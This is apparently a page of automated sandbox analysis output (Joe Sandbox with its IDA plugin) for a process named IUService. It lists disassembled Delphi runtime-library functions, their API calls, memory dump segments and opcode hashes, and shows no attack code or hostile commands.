                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sysutils@$Dispose$qqrpbLen$qqrpxbLower$qqrpbNew$qqrpxb$Alloc$qqruiMove$qqrpbpxbuiPos$qqrpxbt1Wide
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2681763821-0
                                                                                                                                            • Opcode ID: dde631375cb4bb7d56f948556d53dd842de3bc36197af2cee0c4b0b25e22cf47
                                                                                                                                            • Instruction ID: 6bbc18074bfaf3f13c2d9ba9562f9445baf5c414cd24152d0a15d7c6618943bb
                                                                                                                                            • Opcode Fuzzy Hash: dde631375cb4bb7d56f948556d53dd842de3bc36197af2cee0c4b0b25e22cf47
                                                                                                                                            • Instruction Fuzzy Hash: 97012C71A02688AFDB01DFF8EC4168DB7F4EF18300F5186B6F514E3241DA749E818B95
                                                                                                                                            Function 50005654 Relevance: 10.5, APIs: 7, Instructions: 41COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120 ref: 5000565F
                                                                                                                                              • Part of subcall function 500087A8: @System@@FreeMem$qqrpv.RTL120(?,50004445,5000444D), ref: 500087C4
                                                                                                                                            • @System@@ReadString$qqrr15System@TTextRecp28System@%SmallString$iuc$255%i.RTL120 ref: 50005673
                                                                                                                                            • @System@@LStrFromString$qqrr27System@%AnsiStringT$us$i0$%rx28System@%SmallString$iuc$255%us.RTL120 ref: 5000567E
                                                                                                                                            • @System@@ReadString$qqrr15System@TTextRecp28System@%SmallString$iuc$255%i.RTL120 ref: 50005692
                                                                                                                                            • @System@@LStrFromString$qqrr27System@%AnsiStringT$us$i0$%rx28System@%SmallString$iuc$255%us.RTL120(00000000), ref: 5000569F
                                                                                                                                            • @System@@LStrCat$qqrv.RTL120(00000000), ref: 500056A9
                                                                                                                                              • Part of subcall function 50008C34: @System@@LStrSetLength$qqrv.RTL120(?,?,?,500056AE,00000000), ref: 50008C5B
                                                                                                                                              • Part of subcall function 50008C34: @System@@LStrAsg$qqrpvpxv.RTL120(00000000,?,?,?,500056AE,00000000), ref: 50008C72
                                                                                                                                              • Part of subcall function 50008C34: @System@Move$qqrpxvpvi.RTL120(00000000,?,?,?,500056AE,00000000), ref: 50008C81
                                                                                                                                              • Part of subcall function 50008C34: @System@@LStrClr$qqrpv.RTL120(00000000,?,?,?,500056AE,00000000), ref: 50008C8E
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(00000000), ref: 500056B0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$System@%$Small$Clr$qqrpvSystem@$AnsiFromReadRecp28StringString$iuc$255%iString$iuc$255%usString$qqrr15String$qqrr27T$us$i0$%rx28Text$Asg$qqrpvpxvCat$qqrvFreeLength$qqrvMem$qqrpvMove$qqrpxvpvi
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 662791780-0
                                                                                                                                            • Opcode ID: 322fabd3b3d09446b172a1f4d472e40869cc5ee6efa0138ea9fa57a789ac56db
                                                                                                                                            • Instruction ID: 1597da7cb89d32d484f3510e975d69330bfa973a8168dd2e4a5d6276ee6f1995
                                                                                                                                            • Opcode Fuzzy Hash: 322fabd3b3d09446b172a1f4d472e40869cc5ee6efa0138ea9fa57a789ac56db
                                                                                                                                            • Instruction Fuzzy Hash: 9AF09A61B0628007F30822AC686227EB6C65FE9621FE4433AB1A8C73C6CD658C8203C7
                                                                                                                                            Function 500042F0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentDirectoryA.KERNEL32(00000105,?), ref: 50004321
                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?,00000105,?), ref: 50004327
                                                                                                                                            • GetCurrentDirectoryA.KERNEL32(00000105,?), ref: 50004336
                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?,00000105,?), ref: 50004347
                                                                                                                                            • @System@@LStrFromArray$qqrr27System@%AnsiStringT$us$i0$%pcius.RTL120(00000000,00000105,?), ref: 50004359
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CurrentDirectory$AnsiArray$qqrr27FromStringSystem@%System@@T$us$i0$%pcius
                                                                                                                                            • String ID: :
                                                                                                                                            • API String ID: 812956231-336475711
                                                                                                                                            • Opcode ID: d4531ae81b963544f021ef1ea90c9204504484a3f5f4716b71b7cf15e618fe7b
                                                                                                                                            • Instruction ID: 14dd6047c926db84beaf63a8d0797b2290f23bae7271ad8ecbc2d364b264a1e3
                                                                                                                                            • Opcode Fuzzy Hash: d4531ae81b963544f021ef1ea90c9204504484a3f5f4716b71b7cf15e618fe7b
                                                                                                                                            • Instruction Fuzzy Hash: 2DF09C712857C459F301D2A45862FDB72DC8F54305F884555BAC887282E6A4894483A3
                                                                                                                                            Function 50004368 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 5000439E
                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,00000105,?), ref: 500043A4
                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 500043B3
                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,00000105,?), ref: 500043C4
                                                                                                                                            • @System@@WStrFromWArray$qqrr17System@WideStringpbi.RTL120(00000105,?), ref: 500043D4
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CurrentDirectory$Array$qqrr17FromStringpbiSystem@System@@Wide
                                                                                                                                            • String ID: :
                                                                                                                                            • API String ID: 3520144690-336475711
                                                                                                                                            • Opcode ID: e61c8ef50fbd8babb1a17a426603306d17aff3204d3b54cd90e2a3508138ba61
                                                                                                                                            • Instruction ID: e1ff67e176dda81c190dc6a9f1a3f12452a8938599ecb663bcea915995d7201c
                                                                                                                                            • Opcode Fuzzy Hash: e61c8ef50fbd8babb1a17a426603306d17aff3204d3b54cd90e2a3508138ba61
                                                                                                                                            • Instruction Fuzzy Hash: BEF0F6A118538465F300C7909862BEB72DCDF94300F84461A7AC8C7291E764854883A7
                                                                                                                                            Function 500310C0 Relevance: 9.1, APIs: 6, Instructions: 96COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Variants@@DispInvoke$qp8TVarDatarx8TVarDatap16System@TCallDescpv.RTL120(?,?,?,?), ref: 500310E2
                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 50031100
                                                                                                                                            • @Variants@FindCustomVariantType$qqrxusrp27Variants@TCustomVariantType.RTL120(00000000,500311B4,?,?), ref: 50031166
                                                                                                                                            • @Variants@VarInvalidOp$qqrv.RTL120(00000000,500311B4,?,?), ref: 50031186
                                                                                                                                            • @Variants@@VarCopy$qqrr8TVarDatarx8TVarData.RTL120(500311BB,?), ref: 500311A6
                                                                                                                                            • @Variants@@VarClear$qqrr8TVarData.RTL120(500311BB,?), ref: 500311AE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: VariantVariants@Variants@@$CustomDataDatarx8$CallClear$qqrr8Copy$qqrr8Datap16DescpvDispFindInitInvalidInvoke$qp8Op$qqrvSystem@TypeType$qqrxusrp27
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3013499437-0
                                                                                                                                            • Opcode ID: 5ac3dfb80ff6f8dbe992fc935fb1ad922ec3ea8af3cd2fded624ac4e5225a757
                                                                                                                                            • Instruction ID: 51b27559867bc955ec8fe122dba071485ba265a6bf2b90f3f5acb68f7b654021
                                                                                                                                            • Opcode Fuzzy Hash: 5ac3dfb80ff6f8dbe992fc935fb1ad922ec3ea8af3cd2fded624ac4e5225a757
                                                                                                                                            • Instruction Fuzzy Hash: 70314D75A04288AFDB12DFA8D981ADE77FCEB0C240F544662FA04D3251D770DD90CBA1
                                                                                                                                            Function 50028108 Relevance: 9.1, APIs: 6, Instructions: 96COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50028208), ref: 5002814F
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50028208), ref: 50028179
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,50028208), ref: 500281B2
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,50028208), ref: 500281DF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AnsiFromStr$qqrr20StringStringx27System@System@%System@@T$us$i0$%Unicode$Internal
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2707610650-0
                                                                                                                                            • Opcode ID: 82b5875e0cacdd6aef663cdc39e97f39450629254dff49b71527a16e955c069e
                                                                                                                                            • Instruction ID: 393b429e180957fc2cfbae899d8291979aea1af8c2bec8120106278b796e9974
                                                                                                                                            • Opcode Fuzzy Hash: 82b5875e0cacdd6aef663cdc39e97f39450629254dff49b71527a16e955c069e
                                                                                                                                            • Instruction Fuzzy Hash: D8313C34B02186EBDB01DFB8E98299DB7F9EF44200B6086B6D500D7695E730EF55D740
                                                                                                                                            Function 5001F77C Relevance: 9.1, APIs: 6, Instructions: 96COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@WideFormatBuf$qqrpvuipxvuipx14System@TVarRecxirx24Sysutils@TFormatSettings.RTL120(?,?,?,?), ref: 5001F7D8
                                                                                                                                            • @System@@WStrFromPWCharLen$qqrr17System@WideStringpbi.RTL120(?,?,?,?), ref: 5001F7F3
                                                                                                                                            • @System@@WStrClr$qqrpv.RTL120 ref: 5001F812
                                                                                                                                              • Part of subcall function 50009588: SysFreeString.OLEAUT32(?), ref: 50009596
                                                                                                                                            • @System@@WStrSetLength$qqrr17System@WideStringi.RTL120 ref: 5001F81B
                                                                                                                                              • Part of subcall function 50009C30: @System@@NewWideString$qqri.RTL120(?,?,?,?,5000965D,?,?,?), ref: 50009C40
                                                                                                                                              • Part of subcall function 50009C30: @System@Move$qqrpxvpvi.RTL120(?,?,?,?,5000965D,?,?,?), ref: 50009C6E
                                                                                                                                            • @Sysutils@WideFormatBuf$qqrpvuipxvuipx14System@TVarRecxirx24Sysutils@TFormatSettings.RTL120(?,?,?,?), ref: 5001F845
                                                                                                                                            • @System@@WStrSetLength$qqrr17System@WideStringi.RTL120 ref: 5001F85A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Wide$System@@$FormatSysutils@$Buf$qqrpvuipxvuipx14Length$qqrr17Recxirx24SettingsStringi$CharClr$qqrpvFreeFromLen$qqrr17Move$qqrpxvpviStringString$qqriStringpbi
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2345622591-0
                                                                                                                                            • Opcode ID: f55d6f8b79e0f7ac82ec5d1309f64e9aceca909fd4ec5542df17d6911c072fd6
                                                                                                                                            • Instruction ID: 727f941c8df5292463c23cd37930f27cc77a2850270d934a36b895f9e6f66720
                                                                                                                                            • Opcode Fuzzy Hash: f55d6f8b79e0f7ac82ec5d1309f64e9aceca909fd4ec5542df17d6911c072fd6
                                                                                                                                            • Instruction Fuzzy Hash: 42314F75F01549AFDB40CEADDC819AEB3F9EF58210B5082A6F918E7354DA30EE41CB90
                                                                                                                                            Function 5001F698 Relevance: 9.1, APIs: 6, Instructions: 92COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@WideFormatBuf$qqrpvuipxvuipx14System@TVarRecxi.RTL120(?,?,?), ref: 5001F6F0
                                                                                                                                            • @System@@WStrFromPWCharLen$qqrr17System@WideStringpbi.RTL120(?,?,?), ref: 5001F70B
                                                                                                                                            • @System@@WStrClr$qqrpv.RTL120 ref: 5001F72A
                                                                                                                                              • Part of subcall function 50009588: SysFreeString.OLEAUT32(?), ref: 50009596
                                                                                                                                            • @System@@WStrSetLength$qqrr17System@WideStringi.RTL120 ref: 5001F733
                                                                                                                                              • Part of subcall function 50009C30: @System@@NewWideString$qqri.RTL120(?,?,?,?,5000965D,?,?,?), ref: 50009C40
                                                                                                                                              • Part of subcall function 50009C30: @System@Move$qqrpxvpvi.RTL120(?,?,?,?,5000965D,?,?,?), ref: 50009C6E
                                                                                                                                            • @Sysutils@WideFormatBuf$qqrpvuipxvuipx14System@TVarRecxi.RTL120(?,?,?), ref: 5001F759
                                                                                                                                            • @System@@WStrSetLength$qqrr17System@WideStringi.RTL120 ref: 5001F76E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Wide$System@@$Buf$qqrpvuipxvuipx14FormatLength$qqrr17RecxiStringiSysutils@$CharClr$qqrpvFreeFromLen$qqrr17Move$qqrpxvpviStringString$qqriStringpbi
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4105650016-0
                                                                                                                                            • Opcode ID: 10139ca0b291b8347723082711ce525d742fa5c123425f79956b6c0e53db1538
                                                                                                                                            • Instruction ID: 0f111183127a4ac1b74a776fd40eab0f620fc160a94f9ed32ff36730c38c6e24
                                                                                                                                            • Opcode Fuzzy Hash: 10139ca0b291b8347723082711ce525d742fa5c123425f79956b6c0e53db1538
                                                                                                                                            • Instruction Fuzzy Hash: FF315E75F05549ABEB00CEADDD8199EB3F9EF58210B5082B6E904E7390DA70EE41CB90
                                                                                                                                            Function 5002772C Relevance: 9.1, APIs: 6, Instructions: 92COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002782B,?,?,?,?,?,500156A4,00000000,500156E2), ref: 5002776B
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002782B,?,?,?,?,?,500156A4,00000000,500156E2), ref: 500277A2
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002782B,?,?,?,?,?,500156A4,00000000,500156E2), ref: 500277D2
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002782B,?,?,?,?,?,500156A4,00000000,500156E2), ref: 500277F8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AnsiFromStr$qqrr20StringStringx27System@System@%System@@T$us$i0$%Unicode$Internal
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2707610650-0
                                                                                                                                            • Opcode ID: e7a70c3558bd8af8c47607f7dc99d6952102971f24995eeed80e251423e86636
                                                                                                                                            • Instruction ID: 200609d8e3b54832c1637fbc2b58139f495729bdf34ff5c0e14a03cdfe71e056
                                                                                                                                            • Opcode Fuzzy Hash: e7a70c3558bd8af8c47607f7dc99d6952102971f24995eeed80e251423e86636
                                                                                                                                            • Instruction Fuzzy Hash: 1F31D730A06187EF9F11DFB8EB169BEB3F6EF402007A086A5D508D7155EB70DE42D681
                                                                                                                                            Function 5000B08C Relevance: 9.1, APIs: 6, Instructions: 87COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@LStrAddRef$qqrpv.RTL120(?,?,?,5000B069), ref: 5000B0D3
                                                                                                                                            • @System@@WStrAddRef$qqrr17System@WideString.RTL120(?,?,?,5000B069), ref: 5000B0E2
                                                                                                                                            • @System@@AddRefArray$qqrv.RTL120(?,?,?,?,5000B069), ref: 5000B10E
                                                                                                                                            • @System@@AddRefRecord$qqrv.RTL120(?,?,?,?,5000B069), ref: 5000B124
                                                                                                                                            • @System@@IntfAddRef$qqrx45System@%DelphiInterface$t17System@IInterface%.RTL120(?,?,?,5000B069), ref: 5000B134
                                                                                                                                            • @System@@DynArrayAddRef$qqrv.RTL120(?,?,?,5000B069), ref: 5000B143
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$System@$ArrayArray$qqrvDelphiInterface$t17Interface%IntfRecord$qqrvRef$qqrpvRef$qqrr17Ref$qqrvRef$qqrx45StringSystem@%Wide
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2012329709-0
                                                                                                                                            • Opcode ID: f4ec387a1cd11effdb45d4b7d2cd1ee05245cfe1110f8ce66fbe9255a9397f64
